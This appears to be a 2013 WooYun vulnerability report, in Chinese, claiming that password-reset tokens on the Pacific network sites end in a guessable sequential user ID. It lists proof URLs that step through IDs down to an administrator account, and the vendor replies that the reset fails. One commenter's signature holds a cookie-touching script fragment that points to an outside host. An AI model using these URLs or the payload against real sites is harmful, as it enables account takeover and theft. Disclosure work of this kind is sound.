漏洞概要
关注数(24)
关注此漏洞
漏洞标题:太平洋网络任意修改用户密码(涉及太平洋电脑网.太平洋汽车网.太平洋游戏网.太平洋时尚网.太平洋亲子网.太平洋家居网)3千万用户信息
提交时间:2013-12-27 21:13
修复时间:2013-12-30 15:15
公开时间:2013-12-30 15:15
漏洞类型:设计缺陷/逻辑错误
危害等级:高
自评Rank:20
漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞
Tags标签:
无
漏洞详情
披露状态:
2013-12-27: 细节已通知厂商并且等待厂商处理中
2013-12-30: 厂商已经主动忽略漏洞,细节向公众公开
简要描述:
太平洋网络任意修改用户密码(涉及太平洋电脑网.太平洋汽车网.太平洋游戏网.太平洋时尚网.太平洋亲子网.太平洋家居网)3千万用户信息无任何保障
详细说明:
太平洋网络任意修改用户密码(涉及太平洋电脑网.太平洋汽车网.太平洋游戏网.太平洋时尚网.太平洋亲子网.太平洋家居网)3千万用户信息无任何保障
看见太平洋在送礼物哥就来
废话不多说,去找xss没啥利用的
然后想起 我提交的360任意修改密码的漏洞
就想试试 看看找回密码的连接和注册验证的连接比较
注册验证:http://passport2.pcauto.com.cn/passport2/api/activate.jsp?token=D35CCD46423F56AC8F417083B2C66EDC44F5C44CAA355EF38545C829048D51D88B03B2BB4DBCCA807DADED7EBBDDA38E3E4856A85E254A28-31269713&url=http%3A%2F%2Fmy.pcauto.com.cn%2Fpassport%2Factivate_done.jsp
找回密码:http://my.pconline.com.cn/passport/reset_password.jsp?token=D35CCD46423F56AC8F417083B2C66EDC44F5C44CAA355EF38545C829048D51D8252F925C0FD13AEE-31269713
有没有发现亮点? 31269713
就是这个 然后我就可以操作了
漏洞证明:
http://my.pconline.com.cn/passport/reset_password.jsp?token=D35CCD46423F56AC8F417083B2C66EDC44F5C44CAA355EF38545C829048D51D8252F925C0FD13AEE-31269713
http://my.pconline.com.cn/passport/reset_password.jsp?token=D35CCD46423F56AC8F417083B2C66EDC44F5C44CAA355EF38545C829048D51D8252F925C0FD13AEE-31269712
http://my.pconline.com.cn/passport/reset_password.jsp?token=D35CCD46423F56AC8F417083B2C66EDC44F5C44CAA355EF38545C829048D51D8252F925C0FD13AEE-31269711
最高权限admin 出现在http://my.pconline.com.cn/passport/reset_password.jsp?token=D35CCD46423F56AC8F417083B2C66EDC44F5C44CAA355EF38545C829048D51D8252F925C0FD13AEE-2 然后你懂的
修复方案:
漏洞回应
厂商回应:
危害等级:无影响厂商忽略
忽略时间:2013-12-30 15:15
厂商回复:
非常感谢热心的“JiuShao”大大给我们提供的漏洞信息,经技术部鉴定反馈:虽能修改URL跳转到不同用户的重置密码展示页面,但提交数据时会提示重置密码失败,所以漏洞不存在,但我们后期会安排页面优化,提高用户体验,避免误导用户。
O(∩_∩)O~拉风的长标题已经震撼了我们,请站内私信地址我,有小礼物赠送哦~
感谢乌云网的大大对 太平洋系列网站 信息安全作出的贡献~
最新状态:
暂无
漏洞评价:
评论
-
2013-12-27 21:16 |
niliu 
( 核心白帽子 | Rank:1542 漏洞数:206 | 逆流而上)
-
2013-12-27 21:19 |
小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)
-
2013-12-27 21:19 |
JiuShao ( 普通白帽子 | Rank:405 漏洞数:94 | ╮(╯▽╰)╭锄禾日当午)
-
2013-12-27 21:21 |
JiuShao ( 普通白帽子 | Rank:405 漏洞数:94 | ╮(╯▽╰)╭锄禾日当午)
-
2013-12-27 21:22 |
小驴牙牙 ( 普通白帽子 | Rank:168 漏洞数:43 | 不断学习,进步!)
-
2013-12-27 21:31 |
Focusstart ( 普通白帽子 | Rank:574 漏洞数:163 | 努力让某某某成为最幸福的女人!)
-
2013-12-27 21:32 |
zzR ( 核心白帽子 | Rank:1382 漏洞数:122 | 收wb 1:5 无限量收 [平台担保])
-
2013-12-27 21:40 |
momo ( 实习白帽子 | Rank:91 漏洞数:24 | ★精华漏洞数:24 | WooYun认证√)
-
2013-12-27 22:03 |
MeirLin ( 实习白帽子 | Rank:96 漏洞数:30 | 号借人)
-
2013-12-27 22:03 |
银冥币 ( 实习白帽子 | Rank:35 漏洞数:21 | "/upload/avatar/avatar_251_b.jpg" />)
-
2013-12-27 22:29 |
Rookie ( 普通白帽子 | Rank:288 漏洞数:78 | 123)
-
2013-12-27 22:35 |
tzrj ( 实习白帽子 | Rank:87 漏洞数:24 | 1111)
-
2013-12-27 22:45 |
233 ( 路人 | Rank:14 漏洞数:4 | 小孩子看了根本把持不住)
-
2013-12-28 00:03 |
齐迹 ( 核心白帽子 | Rank:784 漏洞数:100 | 一名普通的phper开发者,关注web安全。)
-
2013-12-28 01:47 |
AC_TEAM ( 路人 | Rank:25 漏洞数:2 | 专注社工三十年)
-
2013-12-28 07:52 |
4399gdww ( 路人 | Rank:20 漏洞数:4 | )
后排专注卖瓜子、水果、爆米花、汽水、板凳、沙发...
-
2013-12-28 09:14 |
hacker@sina.cn ( 普通白帽子 | Rank:288 漏洞数:27 | ANONYMOUS)
-
2013-12-28 09:34 |
Mas ( 实习白帽子 | Rank:42 漏洞数:15 )
-
2013-12-28 09:36 |
q601333824 ( 普通白帽子 | Rank:217 漏洞数:49 | 出自《丹特丽安的书架》---吾问汝,汝为人否...)
-
2013-12-28 10:14 |
麻花藤 ( 路人 | Rank:15 漏洞数:1 | ด้้้้้็็็็็้้้้้็็็็...)
-
2013-12-28 11:32 |
erevus ( 普通白帽子 | Rank:177 漏洞数:31 | Hacked by @ringzero 我錯了)
-
2013-12-28 11:33 |
hanole ( 路人 | Rank:0 漏洞数:1 | [用鼠标的那只手有没有很冷?])
-
2013-12-28 12:43 |
笨小猪 ( 路人 | Rank:16 漏洞数:2 | 杯壁下流)
-
2013-12-28 13:36 |
点点 ( 普通白帽子 | Rank:214 漏洞数:38 | 准备申请سمَـَّوُوُحخ ̷̴̐...)
-
2013-12-28 14:53 |
khjian ( 普通白帽子 | Rank:133 漏洞数:64 | 网站程序员,项目经理,擅长asp,php,asp.ne...)
好长的标题………………………………………………………………………………………………
-
2013-12-28 15:16 |
c:// ( 路人 | Rank:0 漏洞数:1 | 剪刀石头布与猫)
-
2013-12-28 15:37 |
雷锋 ( 路人 | Rank:12 漏洞数:2 | 承接:钻井,架工,木工,电工,水暖工,力...)
-
2013-12-28 16:40 |
沈奇 ( 路人 | Rank:11 漏洞数:9 | 不忘初心,方得始终,想想当初来乌云是为了...)
-
2013-12-28 19:48 |
Black Angel ( 普通白帽子 | Rank:163 漏洞数:35 | 最神奇的一群人,智慧低调又内敛,俗称马甲...)
-
2013-12-28 23:27 |
海琪花 ( 路人 | Rank:0 漏洞数:1 | 卖海产 。。。 不买勿扰)
-
2013-12-29 12:03 |
炯炯虾 ( 路人 | Rank:2 漏洞数:1 | 我来自地球)
-
2013-12-29 12:13 |
JiuShao ( 普通白帽子 | Rank:405 漏洞数:94 | ╮(╯▽╰)╭锄禾日当午)
-
2013-12-29 13:36 |
围剿 ( 路人 | Rank:17 漏洞数:5 | Evil decimal)
-
2013-12-30 08:40 |
T-MAC ( 路人 | Rank:19 漏洞数:2 )
-
2013-12-30 09:59 |
lpcdma ( 路人 | Rank:12 漏洞数:6 | 人类)
-
2013-12-30 10:47 |
terrying ( 实习白帽子 | Rank:59 漏洞数:15 | 雅蠛蝶)
-
2013-12-30 15:28 |
带馅儿馒头 ( 普通白帽子 | Rank:1278 漏洞数:143 | 心在,梦在)
-
2013-12-30 15:34 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2013-12-30 15:40 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
-
2013-12-30 15:41 |
摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)
-
2013-12-30 15:42 |
摸了你 ( 实习白帽子 | Rank:71 漏洞数:17 | 1shitMVqBjCKrnRvSoixMx6RKpG9J8pBM)
@xsser 貌似这个标题,影响到主页显示的布局哇,你瞅瞅
-
2013-12-30 15:50 |
xsser ( 普通白帽子 | Rank:254 漏洞数:18 | 当我又回首一切,这个世界会好吗?)
-
2013-12-30 15:59 |
剑无名 ( 普通白帽子 | Rank:146 漏洞数:32 | 此剑无名。)
-
2013-12-30 16:08 |
wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)
@xsser 个人觉得洞主的素质的话,肯定会去注册多几个账号来测试的,应该还是可以改的
-
2013-12-30 16:11 |
蟋蟀哥哥 ( 普通白帽子 | Rank:363 漏洞数:57 | 巴蜀人士,80后宅男,自学成才,天朝教育失败...)
-
2013-12-30 16:49 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
-
2013-12-30 18:06 |
小胖子 ( 核心白帽子 | Rank:1727 漏洞数:140 | 如果大海能够带走我的矮丑...)
-
2013-12-30 18:39 |
JiuShao ( 普通白帽子 | Rank:405 漏洞数:94 | ╮(╯▽╰)╭锄禾日当午)
恩,厂商不错,不过我也没深入啊?,万一要深入被违法就跪了,
-
2013-12-31 15:39 |
小驴牙牙 ( 普通白帽子 | Rank:168 漏洞数:43 | 不断学习,进步!)
原来是这个道理,为什么不能修改,大概是你的session还保持你的账户
-
2014-01-26 15:36 |
腾讯厂商 ( 路人 | Rank:0 漏洞数:1 | script>document.cookie("http//a.cc/21.js...)
-
2014-01-26 16:58 |
疯狗 ( 实习白帽子 | Rank:44 漏洞数:2 | 阅尽天下漏洞,心中自然无码。)
